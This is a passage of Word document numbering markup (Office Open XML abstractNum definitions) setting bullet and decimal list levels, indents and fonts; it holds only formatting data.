      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4221" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5021" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5821" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6621" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="32">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="*"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="220" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:w w:val="100"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1020" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1820" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2620" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3420" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4221" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5021" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5821" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6621" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="12"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1201" w:hanging="999"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="7"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1201" w:hanging="999"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1201" w:hanging="999"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:cs="PMingLiU"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="141"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="911" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:w w:val="99"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3663" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4484" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5306" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6127" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6948" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="30">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="*"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="618" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:w w:val="100"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1380" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2140" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2900" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3660" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4421" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5181" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5941" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6701" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="12"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1060" w:hanging="857"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1060" w:hanging="857"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Book Antiqua" w:hAnsi="Book Antiqua" w:eastAsia="Book Antiqua" w:cs="Book Antiqua"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="118"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="910" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        <w:color w:val="818181"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2733" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3570" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4407" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5244" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6080" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6917" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="10"/>
      <w:numFmt w:val="upperRoman"/>
      <w:lvlText w:val="%1-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="414" w:hanging="212"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="99"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="910" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        <w:color w:val="818181"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1772" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2624" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3477" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4329" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5181" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6034" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6886" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="26">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1055" w:hanging="852"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1055" w:hanging="852"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1055" w:hanging="852"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:cs="PMingLiU"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="141"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2733" w:hanging="852"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3570" w:hanging="852"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4407" w:hanging="852"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5244" w:hanging="852"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6080" w:hanging="852"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6917" w:hanging="852"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="24">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="904" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="904" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Book Antiqua" w:hAnsi="Book Antiqua" w:eastAsia="Book Antiqua" w:cs="Book Antiqua"/>
        <w:spacing w:val="-1"/>
        <w:w w:val="118"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="911" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        <w:color w:val="818181"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2624" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3477" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4329" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5181" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6034" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6886" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="315" w:hanging="113"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:w w:val="100"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1147" w:hanging="113"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1974" w:hanging="113"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2801" w:hanging="113"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3628" w:hanging="113"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4455" w:hanging="113"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5282" w:hanging="113"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6109" w:hanging="113"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6936" w:hanging="113"/>
      </w:pPr>
      <w:rPr>
